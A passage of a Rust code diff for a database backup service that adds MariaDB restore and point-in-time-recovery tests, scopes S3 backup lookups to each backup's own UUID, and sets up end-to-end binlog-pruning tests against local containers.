+            &RestoreRequestMode::NewService {
+                name: "orders-copy".into(),
+                parameter_overrides: serde_json::Value::Null,
+            },
+            "external_services/mariadb/orders/2026/05/01/uuid/base.mbstream.gz",
+        );
+        assert!(!destructive);
+        assert!(errors.is_empty(), "unexpected errors: {:?}", errors);
+        assert!(steps.iter().any(|s| s.contains("mariadb-orders-copy")));
+    }
+
+    #[test]
+    fn mariadb_pitr_in_place_is_destructive_but_to_new_service_is_not() {
+        let target = RecoveryTarget::Time { time: Utc::now() };
+        let location = "external_services/mariadb/orders/2026/05/01/uuid/base.mbstream.gz";
+
+        let (steps, destructive, errors) = mariadb_steps(
+            "mariadb_physical_restore",
+            &RestoreRequestMode::Pitr {
+                to_new_service: false,
+                new_service_name: None,
+                target: target.clone(),
+            },
+            location,
+        );
+        assert!(destructive);
+        assert!(errors.is_empty(), "unexpected errors: {:?}", errors);
+        assert!(steps.iter().any(|s| s.contains("--stop-datetime")));
+        assert!(steps.iter().any(|s| s.contains("manifest.json")));
+
+        let (steps, destructive, errors) = mariadb_steps(
+            "mariadb_physical_restore",
+            &RestoreRequestMode::Pitr {
+                to_new_service: true,
+                new_service_name: Some("orders-pitr".into()),
+                target,
+            },
+            location,
+        );
+        assert!(!destructive, "provisioning a sibling touches no live data");
+        assert!(errors.is_empty(), "unexpected errors: {:?}", errors);
+        assert!(steps.iter().any(|s| s.contains("mariadb-orders-pitr")));
+    }
+
+    #[test]
+    fn mariadb_pitr_rejects_targets_the_engine_cannot_honor() {
+        // `recovery_target_to_stop_flag` fails fast on Xid and Name, so the
+        // preview must surface them as errors, not as steps.
+        for target in [
+            RecoveryTarget::Xid { xid: "42".into() },
+            RecoveryTarget::Name {
+                name: "before-migration".into(),
+            },
+        ] {
+            let (_steps, _destructive, errors) = mariadb_steps(
+                "mariadb_physical_restore",
+                &RestoreRequestMode::Pitr {
+                    to_new_service: false,
+                    new_service_name: None,
+                    target,
+                },
+                "external_services/mariadb/orders/2026/05/01/uuid/base.mbstream.gz",
+            );
+            assert_eq!(errors.len(), 1, "expected exactly one error: {:?}", errors);
+        }
+    }
+
+    #[test]
+    fn pitr_location_guard_is_engine_aware() {
+        let physical = "external_services/mariadb/orders/2026/05/01/uuid/base.mbstream.gz";
+        let dump = "external_services/mariadb/orders/2026/05/01/uuid/dump.sql.gz";
+        let walg = "s3://bucket/walg/basebackups_005/base_0000";
+
+        // The regression: a MariaDB physical base is a BARE key, so the
+        // Postgres-shaped `s3://` test rejected every MariaDB PITR at the door.
+        validate_pitr_backup_location("mariadb", physical)
+            .expect("physical MariaDB base must be accepted for PITR");
+        validate_pitr_backup_location("MariaDB", physical)
+            .expect("engine match is case-insensitive");
+
+        let err = validate_pitr_backup_location("mariadb", dump)
+            .expect_err("a logical dump cannot anchor a forward-roll");
+        assert!(
+            matches!(&err, RestoreError::Validation { message } if message.contains("physical (mariadb-backup)")),
+            "MariaDB must get a MariaDB-shaped error, not a WAL-G one: {:?}",
+            err
+        );
+
+        validate_pitr_backup_location("postgres", walg).expect("WAL-G base still accepted");
+        let err = validate_pitr_backup_location("postgres", dump)
+            .expect_err("pg_dump cannot anchor a forward-roll");
+        assert!(
+            matches!(&err, RestoreError::Validation { message } if message.contains("WAL-G")),
+            "got {:?}",
+            err
+        );
+    }
+
+    #[test]
+    fn credential_gates_split_mariadb_by_backup_format() {
+        let physical = "external_services/mariadb/orders/2026/05/01/uuid/base.mbstream.gz";
+        let dump = "external_services/mariadb/orders/2026/05/01/uuid/dump.sql.gz";
+
+        // Physical: datadir swap replaces `mysql.user`, so both the pre-restore
+        // merge and the post-restore password patch are required.
+        assert_eq!(
+            credential_propagation_gates("mariadb", physical),
+            (true, true)
+        );
+        assert_eq!(
+            credential_propagation_gates("MariaDB", physical),
+            (true, true)
+        );
+
+        // Logical dump: `mysql` schema is excluded from the dump, so the
+        // target's credentials never change — merging would make the engine
+        // authenticate with the origin's password and would then overwrite the
+        // target's stored password with a credential it never had.
+        assert_eq!(
+            credential_propagation_gates("mariadb", dump),
+            (false, false)
+        );
+        // Unknown/legacy empty location is treated as non-physical.
+        assert_eq!(credential_propagation_gates("mariadb", ""), (false, false));
+
+        // Other engines are unchanged by the MariaDB format split.
+        assert_eq!(
+            credential_propagation_gates("postgres", "s3://bucket/walg/base"),
+            (true, true)
+        );
+        assert_eq!(
+            credential_propagation_gates("postgres", "backups/x.sql.gz"),
+            (true, true)
+        );
+        assert_eq!(
+            credential_propagation_gates("mongodb", "backups/x.archive.gz"),
+            (true, false)
+        );
+        assert_eq!(
+            credential_propagation_gates("redis", "backups/dump.rdb"),
+            (false, false)
+        );
+    }
+
+    #[test]
+    fn mariadb_dump_restore_has_no_pitr_and_preserves_target_credentials() {
+        let location = "external_services/mariadb/orders/2026/05/01/uuid/dump.sql.gz";
+
+        let (steps, destructive, errors) = mariadb_steps(
+            "mariadb_dump_restore",
+            &RestoreRequestMode::InPlace,
+            location,
+        );
+        assert!(destructive);
+        assert!(errors.is_empty(), "unexpected errors: {:?}", errors);
+        assert!(
+            steps.iter().any(|s| s.contains("excludes the `mysql`")),
+            "the plan must state that a logical dump does NOT carry credentials"
+        );
+
+        let (_steps, _destructive, errors) = mariadb_steps(
+            "mariadb_dump_restore",
+            &RestoreRequestMode::Pitr {
+                to_new_service: false,
+                new_service_name: None,
+                target: RecoveryTarget::Time { time: Utc::now() },
+            },
+            location,
+        );
+        assert_eq!(errors.len(), 1);
+        assert!(errors[0].contains("no binlog anchor"), "{:?}", errors);
+    }
+
+    #[test]
+    fn mariadb_unclassifiable_location_errors_rather_than_guessing() {
+        let (_steps, _destructive, errors) = mariadb_steps(
+            "unsupported",
+            &RestoreRequestMode::InPlace,
+            "external_services/mariadb/orders/some/random/key",
+        );
+        assert_eq!(errors.len(), 1);
+        assert!(errors[0].contains("base.mbstream.gz"), "{:?}", errors);
     }
 
     // ---- PITR out-of-range recovery target validation -------------------

--- a/crates/temps-backup/src/services/restore.rs
+++ b/crates/temps-backup/src/services/restore.rs
@@ -403,15 +403,17 @@ impl RestoreService {
         let mut resolved_location = backup_location.clone();
         let mut location_was_resolved = false;
         if resolved_location.is_empty() {
-            let origin = backup_row
-                .as_ref()
-                .and_then(|b| serde_json::from_str::<serde_json::Value>(&b.metadata).ok())
-                .and_then(|v| {
-                    v.get("service_name")
-                        .and_then(|s| s.as_str())
-                        .map(String::from)
-                });
-            if let Some(origin) = origin {
+            let origin_and_uuid = backup_row.as_ref().and_then(|b| {
+                serde_json::from_str::<serde_json::Value>(&b.metadata)
+                    .ok()
+                    .and_then(|v| {
+                        v.get("service_name")
+                            .and_then(|s| s.as_str())
+                            .map(String::from)
+                    })
+                    .map(|origin| (origin, b.backup_id.clone()))
+            });
+            if let Some((origin, backup_uuid)) = origin_and_uuid {
                 if let Ok(s3_source) = temps_entities::s3_sources::Entity::find_by_id(s3_source_id)
                     .one(self.db.as_ref())
                     .await
@@ -443,6 +445,7 @@ impl RestoreService {
                             &s3_source,
                             &target.service_type,
                             &origin,
+                            &backup_uuid,
                         )
                         .await
                         {
@@ -1664,8 +1667,14 @@ async fn run_restore_inner(
         let engine = target_service.service_type.clone();
 
         if let Some(origin) = origin_service_name {
-            let resolved =
-                resolve_backup_location_from_s3(&s3_client, &s3_source, &engine, &origin).await;
+            let resolved = resolve_backup_location_from_s3(
+                &s3_client,
+                &s3_source,
+                &engine,
+                &origin,
+                &backup_model.backup_id,
+            )
+            .await;
             match resolved {
                 Ok(Some(loc)) => {
                     info!(
@@ -2551,6 +2560,7 @@ async fn resolve_backup_location_from_s3(
     s3_source: &temps_entities::s3_sources::Model,
     engine: &str,
     origin_service_name: &str,
+    backup_uuid: &str,
 ) -> Result<Option<String>, anyhow::Error> {
     let bucket = &s3_source.bucket_name;
     // Mirror the path convention backup_external_service writes to:
@@ -2590,8 +2600,18 @@ async fn resolve_backup_location_from_s3(
         )));
     }
 
-    // 2) pg_dump / rdb / mongodump — pick the newest matching object under
-    //    the service prefix.
+    // 2) pg_dump / rdb / mongodump / mariadb — every non-WAL-G engine writes
+    //    its artifact under `<service_prefix>.../<backup_uuid>/<filename>`
+    //    (see `v2_common::build_external_service_s3_key`, where `backup_uuid`
+    //    is `backups.backup_id`). Scanning the whole service prefix and
+    //    picking the newest matching extension is NOT safe here: a service
+    //    can carry backups from more than one engine/format (e.g. a MariaDB
+    //    physical base and a later logical dump), and "newest of any format"
+    //    can silently return a different backup than the one the caller
+    //    selected. Require the object's key to contain this exact backup's
+    //    own uuid path segment, so the resolver can only ever return the
+    //    artifact that this specific backup wrote.
+    let uuid_segment = format!("/{}/", backup_uuid);
     let mut best: Option<(String, aws_sdk_s3::primitives::DateTime)> = None;
     let mut continuation: Option<String> = None;
     loop {
@@ -2609,6 +2629,9 @@ async fn resolve_backup_location_from_s3(
                 None => continue,
             };
             if key.contains("/walg/") {
+                continue;
+            }
+            if !key.contains(&uuid_segment) {
                 continue;
             }
             if !(key.ends_with(".sql.gz")
@@ -3485,16 +3508,30 @@ mod tests {
         }
     }
 
-    /// REGRESSION (Greptile finding on PR #878): a legacy MariaDB *physical*
-    /// backup row with an empty `s3_location` was undiscoverable, because the
-    /// extension allowlist in `resolve_backup_location_from_s3` did not include
-    /// `.mbstream.gz`. That made the backup permanently unrestorable through
-    /// the repair path — a data-safety bug, not a cosmetic one.
+    /// REGRESSION (Greptile findings on PR #878, two rounds):
+    ///
+    /// 1. A legacy MariaDB *physical* backup row with an empty `s3_location`
+    ///    was undiscoverable, because the extension allowlist in
+    ///    `resolve_backup_location_from_s3` did not include `.mbstream.gz`.
+    ///    That made the backup permanently unrestorable through the repair
+    ///    path — a data-safety bug, not a cosmetic one.
+    /// 2. After (1) was fixed, the resolver still picked the *newest matching
+    ///    object of any format* under the service prefix — so a service with
+    ///    both a physical base and a later logical dump would silently
+    ///    substitute the dump for a physical backup row, restoring the wrong
+    ///    snapshot and format. The fix scopes every non-WAL-G lookup to the
+    ///    calling backup's own `<backup_uuid>/` path segment (`backups.backup_id`,
+    ///    the same uuid every engine already writes its artifact under —
+    ///    see `v2_common::build_external_service_s3_key`), so the resolver can
+    ///    only ever return that specific backup's own object.
     ///
     /// This seeds the exact key shape a physical base occupies in a real
-    /// bucket and asserts the resolver now finds it. It also seeds a logical
+    /// bucket and asserts the resolver now finds it; seeds a logical
     /// `dump.sql.gz` under a *different* service prefix and asserts that one
-    /// still resolves, so the fix is additive rather than a swap.
+    /// still resolves (the extension fix is additive, not a swap); and seeds
+    /// a physical base and a NEWER logical dump under the SAME service
+    /// prefix with different backup uuids, asserting each backup's own uuid
+    /// resolves to its own artifact rather than the newer one winning.
     #[cfg(feature = "docker-tests")]
     #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
     async fn resolve_backup_location_from_s3_finds_mariadb_physical_and_logical_backups() {
@@ -3520,13 +3557,13 @@ mod tests {
 
         let physical_service = "orders-physical";
         let logical_service = "orders-logical";
+        let physical_uuid = uuid::Uuid::new_v4().to_string();
+        let logical_uuid = uuid::Uuid::new_v4().to_string();
         let physical_key = format!(
-            "external_services/mariadb/{physical_service}/2026/01/01/{}/base.mbstream.gz",
-            uuid::Uuid::new_v4()
+            "external_services/mariadb/{physical_service}/2026/01/01/{physical_uuid}/base.mbstream.gz"
         );
         let logical_key = format!(
-            "external_services/mariadb/{logical_service}/2026/01/01/{}/dump.sql.gz",
-            uuid::Uuid::new_v4()
+            "external_services/mariadb/{logical_service}/2026/01/01/{logical_uuid}/dump.sql.gz"
         );
         // Engines always write a `metadata.json` companion next to the
         // artifact; seeding it proves the resolver picks the artifact and not
@@ -3551,10 +3588,15 @@ mod tests {
         }
 
         // ---- Act + Assert: physical base is now discoverable --------------
-        let physical =
-            resolve_backup_location_from_s3(&s3_client, &s3_source, "mariadb", physical_service)
-                .await
-                .expect("listing a reachable bucket must not error");
+        let physical = resolve_backup_location_from_s3(
+            &s3_client,
+            &s3_source,
+            "mariadb",
+            physical_service,
+            &physical_uuid,
+        )
+        .await
+        .expect("listing a reachable bucket must not error");
         eprintln!("resolved physical location = {physical:?}");
         let physical = physical.expect(
             "a .mbstream.gz physical base must be discoverable; before the \
@@ -3567,10 +3609,15 @@ mod tests {
         assert_eq!(physical, physical_key, "resolver must return the exact key");
 
         // ---- Assert: the logical-dump path did not regress ----------------
-        let logical =
-            resolve_backup_location_from_s3(&s3_client, &s3_source, "mariadb", logical_service)
-                .await
-                .expect("listing a reachable bucket must not error");
+        let logical = resolve_backup_location_from_s3(
+            &s3_client,
+            &s3_source,
+            "mariadb",
+            logical_service,
+            &logical_uuid,
+        )
+        .await
+        .expect("listing a reachable bucket must not error");
         eprintln!("resolved logical location = {logical:?}");
         let logical = logical.expect("a .sql.gz logical dump must stay discoverable");
         assert_eq!(
@@ -3579,13 +3626,90 @@ mod tests {
         );
 
         // ---- Assert: an unknown service still resolves to None ------------
-        let missing =
-            resolve_backup_location_from_s3(&s3_client, &s3_source, "mariadb", "no-such-service")
-                .await
-                .expect("listing an empty prefix must not error");
+        let missing = resolve_backup_location_from_s3(
+            &s3_client,
+            &s3_source,
+            "mariadb",
+            "no-such-service",
+            &physical_uuid,
+        )
+        .await
+        .expect("listing an empty prefix must not error");
         assert!(
             missing.is_none(),
             "an empty service prefix must resolve to None, got {missing:?}"
+        );
+
+        // ---- REGRESSION (round 2): same service, two backups of different
+        //      formats and different ages — the resolver must not let the
+        //      newer one win when a specific backup's own uuid is given. ---
+        let shared_service = "orders-mixed-formats";
+        let older_physical_uuid = uuid::Uuid::new_v4().to_string();
+        let newer_logical_uuid = uuid::Uuid::new_v4().to_string();
+        let older_physical_key = format!(
+            "external_services/mariadb/{shared_service}/2026/01/01/{older_physical_uuid}/base.mbstream.gz"
+        );
+        let newer_logical_key = format!(
+            "external_services/mariadb/{shared_service}/2026/01/02/{newer_logical_uuid}/dump.sql.gz"
+        );
+        // Seed the OLDER physical object first, then the NEWER logical
+        // object second, so a naive "pick whatever S3 reports as most
+        // recently modified" implementation would pick the logical one.
+        if let Err(e) = s3_client
+            .put_object()
+            .bucket(bucket)
+            .key(&older_physical_key)
+            .body(aws_sdk_s3::primitives::ByteStream::from_static(b"seed"))
+            .send()
+            .await
+        {
+            eprintln!("Could not seed object {older_physical_key}, skipping: {e}");
+            return;
+        }
+        tokio::time::sleep(std::time::Duration::from_secs(2)).await;
+        if let Err(e) = s3_client
+            .put_object()
+            .bucket(bucket)
+            .key(&newer_logical_key)
+            .body(aws_sdk_s3::primitives::ByteStream::from_static(b"seed"))
+            .send()
+            .await
+        {
+            eprintln!("Could not seed object {newer_logical_key}, skipping: {e}");
+            return;
+        }
+
+        let resolved_for_older = resolve_backup_location_from_s3(
+            &s3_client,
+            &s3_source,
+            "mariadb",
+            shared_service,
+            &older_physical_uuid,
+        )
+        .await
+        .expect("listing a reachable bucket must not error")
+        .expect("the older physical backup's own artifact must still be discoverable by its uuid");
+        eprintln!("resolved (older physical uuid) = {resolved_for_older}");
+        assert_eq!(
+            resolved_for_older, older_physical_key,
+            "SECURITY/DATA-SAFETY: resolving the OLDER physical backup's own uuid must return \
+             its own artifact, not the newer logical dump under the same service prefix — \
+             substituting artifacts here means restoring the wrong snapshot in the wrong format"
+        );
+
+        let resolved_for_newer = resolve_backup_location_from_s3(
+            &s3_client,
+            &s3_source,
+            "mariadb",
+            shared_service,
+            &newer_logical_uuid,
+        )
+        .await
+        .expect("listing a reachable bucket must not error")
+        .expect("the newer logical backup's own artifact must be discoverable by its uuid");
+        assert_eq!(
+            resolved_for_newer, newer_logical_key,
+            "resolving the newer logical backup's own uuid must return its own artifact"
         );
     }
 }

--- a/crates/temps-backup/tests/mariadb_pitr_e2e.rs
+++ b/crates/temps-backup/tests/mariadb_pitr_e2e.rs
@@ -774,6 +774,896 @@ async fn run_pitr_flow(
     Ok(())
 }
 
+// ─────────────────────────────────────────────────────────────────────────────
+// Shared setup for the additional end-to-end flows below.
+// ─────────────────────────────────────────────────────────────────────────────
+
+/// Everything the extra E2E flows need: a live Docker daemon, a migrated
+/// Postgres test DB, a MinIO with `BUCKET` created, and a running MariaDB
+/// source container with binary logging on.
+///
+/// The `_*_guard` fields are RAII container reapers — they must be held for the
+/// lifetime of the test, and `_test_db` must outlive `pool` (dropping the
+/// `TestDatabase` tears down its schema).
+struct E2eEnv {
+    docker: Docker,
+    _test_db: temps_database::test_utils::TestDatabase,
+    pool: Arc<temps_database::DbConnection>,
+    minio_port: u16,
+    _minio_guard: ContainerGuard,
+    s3_client: aws_sdk_s3::Client,
+    service_name: String,
+    container_name: String,
+    mariadb_port: u16,
+    _mariadb_guard: ContainerGuard,
+}
+
+/// Boot the whole fixture. Returns `None` (graceful skip) whenever any piece of
+/// infrastructure is unavailable — never panics on missing infrastructure, only
+/// on real assertion failures once a flow is running.
+async fn setup_e2e_env(name_prefix: &str) -> Option<E2eEnv> {
+    init_tracing();
+
+    let docker = connect_docker().await?;
+
+    let test_db = match temps_database::test_utils::TestDatabase::with_migrations().await {
+        Ok(db) => db,
+        Err(e) => {
+            eprintln!("Test database unavailable, skipping: {e}");
+            return None;
+        }
+    };
+    let pool = test_db.connection_arc();
+
+    let (minio_port, minio_guard) = boot_minio(&docker).await?;
+    let s3_client = build_s3_client(minio_port)?;
+    if let Err(e) = s3_client.create_bucket().bucket(BUCKET).send().await {
+        eprintln!("Could not create MinIO bucket, skipping: {e}");
+        return None;
+    }
+
+    let service_name = format!("{name_prefix}{}", uuid::Uuid::new_v4().simple());
+    let (container_name, mariadb_port, mariadb_guard) =
+        boot_mariadb_source(&docker, &service_name).await?;
+    eprintln!("Booted MariaDB source container {container_name} on host port {mariadb_port}");
+
+    Some(E2eEnv {
+        docker,
+        _test_db: test_db,
+        pool,
+        minio_port,
+        _minio_guard: minio_guard,
+        s3_client,
+        service_name,
+        container_name,
+        mariadb_port,
+        _mariadb_guard: mariadb_guard,
+    })
+}
+
+/// Insert the encrypted `external_services` + `s3_sources` + `users` rows the
+/// engines read, mirroring what the production executor persists before it
+/// invokes an engine. Returns `(service_model, s3_source_model, user_id)`.
+async fn seed_service_rows(
+    pool: &temps_database::DbConnection,
+    encryption: &EncryptionService,
+    service_name: &str,
+    mariadb_port: u16,
+    minio_port: u16,
+) -> anyhow::Result<(
+    temps_entities::external_services::Model,
+    temps_entities::s3_sources::Model,
+    i32,
+)> {
+    let config_plaintext = mariadb_params(service_name, mariadb_port).to_string();
+    let config_encrypted = encryption.encrypt_string(&config_plaintext)?;
+
+    let service_model = temps_entities::external_services::ActiveModel {
+        name: Set(service_name.to_string()),
+        service_type: Set("mariadb".to_string()),
+        version: Set(None),
+        status: Set("running".to_string()),
+        config: Set(Some(config_encrypted)),
+        topology: Set("standalone".to_string()),
+        ..Default::default()
+    }
+    .insert(pool)
+    .await?;
+
+    let s3_source_model = temps_entities::s3_sources::ActiveModel {
+        name: Set("pitr-s3".to_string()),
+        bucket_name: Set(BUCKET.to_string()),
+        region: Set("us-east-1".to_string()),
+        endpoint: Set(Some(format!("http://127.0.0.1:{minio_port}"))),
+        bucket_path: Set(String::new()),
+        access_key_id: Set(encryption.encrypt_string(MINIO_ACCESS_KEY)?),
+        secret_key: Set(encryption.encrypt_string(MINIO_SECRET_KEY)?),
+        force_path_style: Set(Some(true)),
+        is_default: Set(true),
+        ..Default::default()
+    }
+    .insert(pool)
+    .await?;
+
+    let user = temps_entities::users::ActiveModel {
+        name: Set("pitr-test-user".to_string()),
+        email: Set(format!(
+            "pitr-{}@example.test",
+            uuid::Uuid::new_v4().simple()
+        )),
+        email_verified: Set(true),
+        mfa_enabled: Set(false),
+        ..Default::default()
+    }
+    .insert(pool)
+    .await?;
+
+    Ok((service_model, s3_source_model, user.id))
+}
+
+/// Insert the parent `backups` row an engine expects (its public UUID becomes
+/// the artifact directory), run `engine`, then mark the row completed with the
+/// produced location — the same contract `run_pitr_flow` exercises.
+async fn run_engine_backup<E: BackupEngine>(
+    pool_arc: &Arc<temps_database::DbConnection>,
+    engine: &E,
+    engine_key: &str,
+    backup_name: &str,
+    service_id: i32,
+    s3_source_id: i32,
+    user_id: i32,
+) -> anyhow::Result<(String, temps_entities::backups::Model)> {
+    let pool: &temps_database::DbConnection = pool_arc.as_ref();
+    let parent_backup = temps_entities::backups::ActiveModel {
+        name: Set(backup_name.to_string()),
+        backup_id: Set(uuid::Uuid::new_v4().to_string()),
+        backup_type: Set("full".to_string()),
+        state: Set("running".to_string()),
+        started_at: Set(chrono::Utc::now()),
+        s3_source_id: Set(s3_source_id),
+        s3_location: Set(String::new()),
+        metadata: Set("{}".to_string()),
+        compression_type: Set("gzip".to_string()),
+        created_by: Set(user_id),
+        tags: Set("[]".to_string()),
+        ..Default::default()
+    }
+    .insert(pool)
+    .await?;
+
+    let ctx = BackupContext {
+        backup_id: parent_backup.id,
+        engine_key: engine_key.to_string(),
+        params: serde_json::json!({ "service_id": service_id, "s3_source_id": s3_source_id }),
+        cancel: CancellationToken::new(),
+        db: Arc::clone(pool_arc),
+    };
+    let outcome = engine
+        .run(&ctx)
+        .await
+        .map_err(|e| anyhow::anyhow!("{engine_key} engine ({backup_name}): {e}"))?;
+
+    let mut completed = parent_backup.into_active_model();
+    completed.state = Set("completed".to_string());
+    completed.finished_at = Set(Some(chrono::Utc::now()));
+    completed.size_bytes = Set(outcome.size_bytes);
+    completed.s3_location = Set(outcome.location.clone());
+    let backup_model = completed.update(pool).await?;
+
+    eprintln!(
+        "Backup '{backup_name}' ({engine_key}) landed at key: {}",
+        outcome.location
+    );
+    Ok((outcome.location, backup_model))
+}
+
+/// S3 key of one archived binlog segment (empty bucket_path). Mirrors the
+/// provider's `MariaDbService::binlog_object_key`, which is `pub(crate)`.
+fn binlog_segment_key(service_name: &str, file: &str) -> String {
+    format!("external_services/mariadb/{service_name}/binlog/{file}.gz")
+}
+
+/// S3 key of the binlog manifest (empty bucket_path).
+fn binlog_manifest_key(service_name: &str) -> String {
+    format!("external_services/mariadb/{service_name}/binlog/manifest.json")
+}
+
+/// Read and parse the binlog manifest straight out of S3.
+async fn fetch_binlog_manifest(
+    s3_client: &aws_sdk_s3::Client,
+    service_name: &str,
+) -> anyhow::Result<temps_providers::externalsvc::mariadb::BinlogManifest> {
+    let obj = s3_client
+        .get_object()
+        .bucket(BUCKET)
+        .key(binlog_manifest_key(service_name))
+        .send()
+        .await
+        .map_err(|e| anyhow::anyhow!("get binlog manifest: {e}"))?;
+    let bytes = obj.body.collect().await?.into_bytes();
+    eprintln!("DIAG binlog manifest = {}", String::from_utf8_lossy(&bytes));
+    Ok(serde_json::from_slice(&bytes)?)
+}
+
+/// Mirror of the provider's `pub(crate)` `MariaDbService::binlog_is_strictly_older`
+/// ordering rule: same basename, same zero-padded suffix width, lexicographically
+/// smaller. Anything it cannot order with certainty answers `false` (= keep).
+///
+/// Deliberately re-stated here rather than approximated with a plain string
+/// compare — the assertion is only meaningful if it predicts what the
+/// production predicate does.
+fn expect_strictly_older(candidate: &str, anchor: &str) -> bool {
+    fn split(file: &str) -> Option<(&str, &str)> {
+        let (base, suffix) = file.rsplit_once('.')?;
+        if base.is_empty() || suffix.is_empty() || !suffix.chars().all(|c| c.is_ascii_digit()) {
+            return None;
+        }
+        Some((base, suffix))
+    }
+    match (split(candidate), split(anchor)) {
+        (Some((cb, cs)), Some((ab, asuf))) => cb == ab && cs.len() == asuf.len() && cs < asuf,
+        _ => false,
+    }
+}
+
+/// Whether an object exists in the test bucket.
+async fn object_exists(s3_client: &aws_sdk_s3::Client, key: &str) -> bool {
+    s3_client
+        .head_object()
+        .bucket(BUCKET)
+        .key(key)
+        .send()
+        .await
+        .is_ok()
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// E2E #2 — binary-log retention pruning.
+// ─────────────────────────────────────────────────────────────────────────────
+
+/// Drives the REAL binlog retention pruner (`MariaDbService::prune_stale_binlogs`)
+/// against real archived segments in real object storage.
+///
+/// `prune_stale_binlogs` DELETES recovery data, so its safety invariants are
+/// only meaningfully proven against real S3 objects and a real manifest:
+///
+///  * pruning against the OLDEST retained base's anchor never touches that
+///    base's own segment or anything after it (it may drop segments that
+///    predate every retained base — those are genuinely unreachable);
+///  * pruning against a LATER base's anchor (the realistic case: the first base
+///    has aged out, so base #2 is now the oldest retained) deletes exactly the
+///    segments strictly older than that anchor, and nothing else;
+///  * the deleted objects are really gone and the retained ones really remain;
+///  * the rewritten manifest drops only the deleted entries and NEVER rewinds
+///    `last_shipped_file` (rewinding it would re-ship every segment);
+///  * a repeat prune with the same anchor is a no-op, not a double-delete.
+#[tokio::test(flavor = "multi_thread", worker_threads = 4)]
+async fn mariadb_pitr_full_chain_e2e_binlog_retention_prune() {
+    tokio::time::timeout(E2E_TIMEOUT, mariadb_binlog_retention_prune_inner())
+        .await
+        .expect("MariaDB binlog retention E2E timed out")
+}
+
+async fn mariadb_binlog_retention_prune_inner() {
+    let Some(env) = setup_e2e_env("prune").await else {
+        return;
+    };
+    run_binlog_retention_flow(&env)
+        .await
+        .expect("binlog retention end-to-end flow");
+}
+
+async fn run_binlog_retention_flow(env: &E2eEnv) -> anyhow::Result<()> {
+    let pool: &temps_database::DbConnection = env.pool.as_ref();
+    let service_name = env.service_name.as_str();
+    eprintln!(
+        "Running binlog-retention flow against source container {}",
+        env.container_name
+    );
+    let encryption = Arc::new(EncryptionService::new(MASTER_KEY_HEX)?);
+
+    let (service_model, s3_source_model, user_id) = seed_service_rows(
+        pool,
+        &encryption,
+        service_name,
+        env.mariadb_port,
+        env.minio_port,
+    )
+    .await?;
+
+    // Seed a user database so the physical base has something to copy.
+    let src = mysql_pool(env.mariadb_port).await?;
+    sqlx::query("CREATE DATABASE IF NOT EXISTS appdb")
+        .execute(&src)
+        .await?;
+    sqlx::query(
+        "CREATE TABLE IF NOT EXISTS appdb.events (id INT PRIMARY KEY AUTO_INCREMENT, batch CHAR(1) NOT NULL, note VARCHAR(64))",
+    )
+    .execute(&src)
+    .await?;
+    for i in 0..5 {
+        sqlx::query("INSERT INTO appdb.events (batch, note) VALUES ('A', ?)")
+            .bind(format!("a{i}"))
+            .execute(&src)
+            .await?;
+    }
+
+    let engine = temps_backup::engines::mariadb_physical::MariadbPhysicalEngine::new(
+        temps_backup::engines::mariadb_physical::MariadbPhysicalDeps {
+            db: Arc::clone(&env.pool),
+            encryption_service: Arc::clone(&encryption),
+            docker: env.docker.clone(),
+        },
+    );
+
+    // ── Base #1: the first retained base backup ─────────────────────────────
+    let (base1_location, _base1_backup) = run_engine_backup(
+        &env.pool,
+        &engine,
+        "mariadb_physical",
+        "retention-base-1",
+        service_model.id,
+        s3_source_model.id,
+        user_id,
+    )
+    .await?;
+    assert!(
+        base1_location.ends_with("base.mbstream.gz"),
+        "base #1 must be a physical base, got {base1_location}"
+    );
+
+    let mariadb_svc = MariaDbService::new(service_name.to_string(), Arc::new(env.docker.clone()));
+    let mariadb_config = parse_mariadb_config(service_name, env.mariadb_port);
+
+    // ── Ship several segments: each round FLUSHes (rotating the active
+    //    segment closed) and uploads everything newly closed. Real writes in
+    //    between so the segments carry real events. ────────────────────────
+    let mut shipped_total = 0usize;
+    for round in 0..3 {
+        for i in 0..3 {
+            sqlx::query("INSERT INTO appdb.events (batch, note) VALUES ('B', ?)")
+                .bind(format!("pre{round}-{i}"))
+                .execute(&src)
+                .await?;
+        }
+        let n = mariadb_svc
+            .archive_binlogs(&env.s3_client, &s3_source_model, &mariadb_config)
+            .await
+            .map_err(|e| anyhow::anyhow!("archive_binlogs pre-round {round}: {e}"))?;
+        shipped_total += n;
+        eprintln!("archive_binlogs pre-round {round} shipped {n} segment(s)");
+        tokio::time::sleep(Duration::from_millis(500)).await;
+    }
+
+    // ── Base #2, later in the timeline: its anchor is a LATER segment ───────
+    let (base2_location, _base2_backup) = run_engine_backup(
+        &env.pool,
+        &engine,
+        "mariadb_physical",
+        "retention-base-2",
+        service_model.id,
+        s3_source_model.id,
+        user_id,
+    )
+    .await?;
+    assert!(
+        base2_location.ends_with("base.mbstream.gz"),
+        "base #2 must be a physical base, got {base2_location}"
+    );
+
+    // ── Ship more segments AFTER base #2 so the prune has both a "delete"
+    //    side and a "keep" side to prove. ─────────────────────────────────
+    for round in 0..2 {
+        for i in 0..3 {
+            sqlx::query("INSERT INTO appdb.events (batch, note) VALUES ('C', ?)")
+                .bind(format!("post{round}-{i}"))
+                .execute(&src)
+                .await?;
+        }
+        let n = mariadb_svc
+            .archive_binlogs(&env.s3_client, &s3_source_model, &mariadb_config)
+            .await
+            .map_err(|e| anyhow::anyhow!("archive_binlogs post-round {round}: {e}"))?;
+        shipped_total += n;
+        eprintln!("archive_binlogs post-round {round} shipped {n} segment(s)");
+        tokio::time::sleep(Duration::from_millis(500)).await;
+    }
+    src.close().await;
+    eprintln!("Total binlog segments shipped: {shipped_total}");
+
+    // ── Anchors ─────────────────────────────────────────────────────────────
+    let anchor1 = mariadb_svc
+        .base_binlog_anchor(&env.s3_client, BUCKET, &base1_location)
+        .await
+        .map_err(|e| anyhow::anyhow!("base_binlog_anchor(base #1): {e}"))?
+        .ok_or_else(|| {
+            anyhow::anyhow!("base #1 must expose a PITR binlog anchor; got None (pitr disabled?)")
+        })?;
+    let anchor2 = mariadb_svc
+        .base_binlog_anchor(&env.s3_client, BUCKET, &base2_location)
+        .await
+        .map_err(|e| anyhow::anyhow!("base_binlog_anchor(base #2): {e}"))?
+        .ok_or_else(|| {
+            anyhow::anyhow!("base #2 must expose a PITR binlog anchor; got None (pitr disabled?)")
+        })?;
+    eprintln!("DIAG anchors: base#1={anchor1} base#2={anchor2}");
+    assert!(
+        expect_strictly_older(&anchor1, &anchor2),
+        "the FLUSH rotations between the two bases must advance the anchor \
